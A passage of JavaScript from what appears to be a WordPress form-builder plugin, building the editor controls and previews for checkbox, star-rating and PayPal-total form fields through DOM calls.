            adding_randomize.setAttribute("type", "hidden");
            adding_randomize.setAttribute("value", w_randomize);
            adding_randomize.setAttribute("name", i+"_randomizeform_id_temp");			
            adding_randomize.setAttribute("id", i+"_randomizeform_id_temp");
	    
	var adding_allow_other= document.createElement("input");
            adding_allow_other.setAttribute("type", "hidden");
            adding_allow_other.setAttribute("value", w_allow_other);
            adding_allow_other.setAttribute("name", i+"_allow_otherform_id_temp");			
            adding_allow_other.setAttribute("id", i+"_allow_otherform_id_temp");
	    
     var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
	
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
//tbody sarqac		
		var table_little_t = document.createElement('table');
			
		var table_little = document.createElement('tbody');
           	table_little.setAttribute("id", i+"_table_little");
			
		table_little_t.appendChild(table_little);
	
      	var tr_little1 = document.createElement('tr');
	        tr_little1.setAttribute("id", i+"_element_tr1");
		
      	var tr_little2 = document.createElement('tr');
 	        tr_little2.setAttribute("id", i+"_element_tr2");
			
      	var td_little1 = document.createElement('td');
         	td_little1.setAttribute("valign", 'top');
           	td_little1.setAttribute("id", i+"_td_little1");
			
      	var td_little2 = document.createElement('td');
        	td_little2.setAttribute("valign", 'top');
           	td_little2.setAttribute("id", i+"_td_little2");
			

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	n=w_choices.length;
	aaa=false;
	for(j=0; j<n; j++)
	{      	
		var tr_little = document.createElement('tr');
			tr_little.setAttribute("id", i+"_element_tr"+j);
				
		var td_little = document.createElement('td');
			td_little.setAttribute("valign", 'top');
			td_little.setAttribute("id", i+"_td_little"+j);
			td_little.setAttribute("idi", j);
	
		var adding = document.createElement(element);
				adding.setAttribute("type", type);
				adding.setAttribute("id", i+"_elementform_id_temp"+j);
				adding.setAttribute("name", i+"_elementform_id_temp");
				adding.setAttribute("value", w_choices_price[j]);
			if(w_allow_other=="yes" && j==w_allow_other_num)
			{
				adding.setAttribute("other", "1");
				adding.setAttribute("onclick", "set_default('"+i+"','"+j+"','form_id_temp'); show_other_input('"+i+"','form_id_temp');");
			}
			else
				adding.setAttribute("onclick", "set_default('"+i+"','"+j+"','form_id_temp')");
			
		if(w_choices_checked[j]=='1')
		{
			adding.setAttribute("checked", "checked");
		}		
				
				
		var label_adding = document.createElement('label');
				label_adding.setAttribute("id", i+"_label_element"+j);
				label_adding.setAttribute("class","ch_rad_label");
				label_adding.setAttribute("for",i+"_elementform_id_temp"+j);
				label_adding.innerHTML = w_choices[j];
				
		var adding_ch_label = document.createElement('input');
				adding_ch_label.setAttribute("type", "hidden");
				adding_ch_label.setAttribute("id", i+"_elementlabel_form_id_temp"+j);
				adding_ch_label.setAttribute("name", i+"_elementform_id_temp"+j+"_label");
				adding_ch_label.setAttribute("value", w_choices[j]);
				
				
		td_little.appendChild(adding);
		td_little.appendChild(label_adding);
		td_little.appendChild(adding_ch_label);
		tr_little.appendChild(td_little);
		table_little.appendChild(tr_little);
			
		if(w_choices_checked[j]=='1')
			if(w_allow_other=="yes" && j==w_allow_other_num)
				aaa=true;
	}			
	
		var div_ = document.createElement('div');
			div_.setAttribute("id", i+"_divform_id_temp");
	    
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
       	td2.appendChild(adding_type);
	
       	td2.appendChild(adding_required);
       	td2.appendChild(adding_randomize);
       	td2.appendChild(adding_allow_other);
		td2.appendChild(table_little_t);
  		td2.appendChild(div_);
    	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	add_id_and_name(i, 'type_radio');

		if(w_field_label_pos=="top")
					label_top(i);
		
		if(w_flow=="hor")
				
				flow_hor(i);
	if(w_quantity=="yes")
				add_quantity(i);
// form_maker_open_in_popup(11);

change_class(w_class, i);
refresh_attr(i, 'type_checkbox');
if(aaa)
{
	show_other_input(i);
}

add_properties(i, w_property, w_property_values, w_property_type);
spider_popup();
}


function type_star_rating(i, w_field_label, w_field_label_pos, w_field_label_col, w_star_amount, w_required, w_class, w_attr_name, w_attr_value){

    document.getElementById("element_type").value="type_star_rating";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black; padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
	

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
	
				
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
	
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
	
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	
		  
	var el_label_label = document.createElement('label');
	                el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
	        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
		el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
	Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
		
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
	Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_star_size_label = document.createElement('label');
				el_star_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_star_size_label.innerHTML = "Star Amount ";
	
	var el_star_size_input = document.createElement('input');
                el_star_size_input.setAttribute("type", "text");		
                el_star_size_input.setAttribute("id", "edit_for_star_size");		
                el_star_size_input.setAttribute("value", w_star_amount);
                el_star_size_input.style.cssText = "width:100px;";	
				el_star_size_input.setAttribute("onKeyPress", "return check_isnum(event)");	
			   el_star_size_input.setAttribute("onKeyUp", "change_star_amount(this.value,"+i+",'form_id_temp')");
           
	
	var el_star_color_label = document.createElement('label');
	        el_star_color_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_star_color_label.innerHTML = "Star Color";
	
	var el_star_color = document.createElement('select');
                el_star_color.setAttribute("id", "edit_for_label_color");
                el_star_color.setAttribute("name", "edit_for_label_color");
               el_star_color.setAttribute("onchange", "label_color(this.value,"+i+")");
                
	var el_star_color1 = document.createElement('option');
                el_star_color1.setAttribute("id", "edit_for_label_color_yellow");
                el_star_color1.setAttribute("value", "yellow");
Yellow = document.createTextNode("Yellow");

    var el_star_color2 = document.createElement('option');
                el_star_color2.setAttribute("id", "edit_for_label_color_green");
                el_star_color2.setAttribute("value", "green");
Green = document.createTextNode("Green");

    var el_star_color3 = document.createElement('option');
                el_star_color3.setAttribute("id", "edit_for_label_color_blue");
                el_star_color3.setAttribute("value", "blue");
Blue = document.createTextNode("Blue");

    var el_star_color4 = document.createElement('option');
                el_star_color4.setAttribute("id", "edit_for_label_color_red");
                el_star_color4.setAttribute("value", "red");				
 Red = document.createTextNode("Red");              
	
	
	

		if(w_field_label_col=="yellow")
				el_star_color1.setAttribute("selected", "selected");
	else
	{
	if(w_field_label_col=="green")
				el_star_color2.setAttribute("selected", "selected");
				else{
				   if(w_field_label_col=="blue")
				    el_star_color3.setAttribute("selected", "selected");
				else{
				if(w_field_label_col=="red")
				    el_star_color4.setAttribute("selected", "selected");
				
				}
				}
}

	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("disabled", "disabled");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_star_rating')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_star_rating')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_star_rating')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_star_rating')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	
	edit_main_td3.appendChild(el_star_size_label);
	edit_main_td3_1.appendChild(el_star_size_input);

    edit_main_td4.appendChild(el_star_color_label);
	
	el_star_color1.appendChild(Yellow);
	el_star_color2.appendChild(Green);
	el_star_color3.appendChild(Blue);
	el_star_color4.appendChild(Red);
	
	el_star_color.appendChild(el_star_color1);
	el_star_color.appendChild(el_star_color2);
	el_star_color.appendChild(el_star_color3);
	el_star_color.appendChild(el_star_color4);
	
	edit_main_td4_1.appendChild(el_star_color);
	
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br1);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
    edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
	
//show table

	
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_star_rating");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
		
			
			
	var adding_star_amount = document.createElement("input");
           	 	adding_star_amount.setAttribute("type", "hidden");
           	 	adding_star_amount.setAttribute("value", w_star_amount);
			adding_star_amount.setAttribute("id", i+"_star_amountform_id_temp");
			adding_star_amount.setAttribute("name", i+"_star_amountform_id_temp");
			
	var adding_star_color = document.createElement("input");
            adding_star_color.setAttribute("type", "hidden");
            adding_star_color.setAttribute("value", w_field_label_col);
            adding_star_color.setAttribute("name", i+"_star_colorform_id_temp");	
            adding_star_color.setAttribute("id", i+"_star_colorform_id_temp");
			
var select_star_amount = document.createElement("input");
           	 	select_star_amount.setAttribute("type", "hidden");
           	 	select_star_amount.setAttribute("value", '');
			select_star_amount.setAttribute("id", i+"_selected_star_amountform_id_temp");
			select_star_amount.setAttribute("name", i+"_selected_star_amountform_id_temp");

			
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

		var div1 = document.createElement('div');	
           	div1.setAttribute("id", i+"_elementform_id_temp");
			div1.setAttribute("class", "wdform_star_rating");
			
		var br1 = document.createElement('br');

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required );
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_required);
		td2.appendChild(adding_star_amount);
      	td2.appendChild(adding_star_color);
		td2.appendChild(select_star_amount);
		
		
    for(var j=0;j<w_star_amount;j++){	

	
	var adding=document.createElement("img");
	    adding.setAttribute('id', i+'_star_'+j);
        adding.setAttribute('src', fmc_plugin_url+'/images/star.png');
		adding.setAttribute('onmouseover', "change_src("+j+","+i+",'form_id_temp')");
		adding.setAttribute('onmouseout', "reset_src("+j+","+i+")");
		adding.setAttribute('onclick', "select_star_rating("+j+","+i+",'form_id_temp')");
	   
	   
      	div1.appendChild(adding);
		
	}	
	
	td2.appendChild(div1);
	
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br1);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_star_rating');
}

function type_paypal_total(i, w_field_label, w_field_label_pos, w_class){

	document.getElementById("element_type").value="type_paypal_total";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px; padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
	
	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";
	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";	

	
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
				el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");

                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
	
	
	var el_style_label = document.createElement('label');
	    el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        el_style_textarea.style.cssText = "width:200px;";
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	
		
				
	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
		

	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	
	edit_main_td3.appendChild(el_style_label);
	edit_main_td3_1.appendChild(el_style_textarea);

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	
		var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_paypal_total");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	
	
	    
     var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
	
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
//tbody sarqac		
		

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      
	
		
	
	
		var div_paypal = document.createElement('div');
			div_paypal.setAttribute("id", i+"paypal_totalform_id_temp");
			div_paypal.setAttribute("class", "wdform_paypal_total paypal_totalform_id_temp");
	    
		var div_total = document.createElement('div');
			div_total.setAttribute("id", i+"div_totalform_id_temp");
			div_total.setAttribute("class", "div_totalform_id_temp");
			div_total.style.cssText = 'margin-bottom:10px;';
			div_total.innerHTML = '<!--repstart-->$300<!--repend-->';
		
		var div_products = document.createElement('div');
			div_products.setAttribute("id", i+"paypal_productsform_id_temp");
			div_products.setAttribute("class", "paypal_productsform_id_temp");
			div_products.style.cssText = 'border-spacing: 2px;';
		
    var div_product1 = document.createElement('div');
    div_product1.style.cssText = 'border-spacing: 2px;';
		div_product1.innerHTML = '<!--repstart-->product 1 $100<!--repend-->';
		
		var div_product2 = document.createElement('div');
			div_product2.style.cssText = 'border-spacing: 2px;';
			div_product2.innerHTML = '<!--repstart-->product 2 $200<!--repend-->';
		
		var div_tax = document.createElement('div');
			div_tax.style.cssText = 'border-spacing: 2px; margin-top:7px;';
			div_tax.setAttribute("id", i+"paypal_taxform_id_temp");
			div_tax.setAttribute("class", "paypal_taxform_id_temp");
			
		var input_for_total = document.createElement("input");
            input_for_total.setAttribute("type", "hidden");
            input_for_total.setAttribute("value", '');
            input_for_total.setAttribute("name", i+"_paypal_totalform_id_temp");	
			input_for_total.setAttribute("class", "input_paypal_totalform_id_temp");
		
		div_paypal.appendChild(input_for_total);
		div_products.appendChild(div_product1);
		div_products.appendChild(div_product2);
		div_paypal.appendChild(div_products);
		div_paypal.appendChild(div_total);
    div_paypal.appendChild(div_tax);
		
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      
       	td2.appendChild(adding_type);
	
       
  		td2.appendChild(div_paypal);
    	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	
change_class(w_class, i);
}





function change_src(id,a,form_id)
{
	for(var j=0;j<=id;j++)
	document.getElementById(a+'_star_'+j).src=fmc_plugin_url+'/images/star_'+document.getElementById(a+'_star_colorform_id_temp').value+".png";
}


function reset_src(id,a)
{
	for(var j=0;j<=id;j++)
	document.getElementById(a+'_star_'+j).src=fmc_plugin_url+'/images/star.png';
}

function select_star_rating(id,a,form_id)
{
}


function change_star_amount(b,a,form_id)
{
	var td=document.getElementById(a+"_element_sectionform_id_temp");
	var div=document.getElementById(a+"_elementform_id_temp");
	td.removeChild(div);

	var div1 = document.createElement('div');	
				div1.setAttribute("id", a+"_elementform_id_temp");
			
 for(var j=0;j<b;j++){	
	var adding_img=document.createElement("img");
	    adding_img.setAttribute('id', a+'_star_'+j);
        adding_img.setAttribute('src', fmc_plugin_url+'/images/star.png');
		adding_img.setAttribute('onmouseover', "change_src("+j+","+a+",'form_id_temp')");
		adding_img.setAttribute('onmouseout', "reset_src("+j+","+a+")");
	   	adding_img.setAttribute('onclick', "select_star_rating("+j+","+a+",'form_id_temp')");
		
      	div1.appendChild(adding_img);
		
	}
	
	td.appendChild(div1);
	document.getElementById(a+'_star_amountform_id_temp').value=b;
}

function label_color(b,a)
{
	document.getElementById(a+'_star_colorform_id_temp').value=b;
}

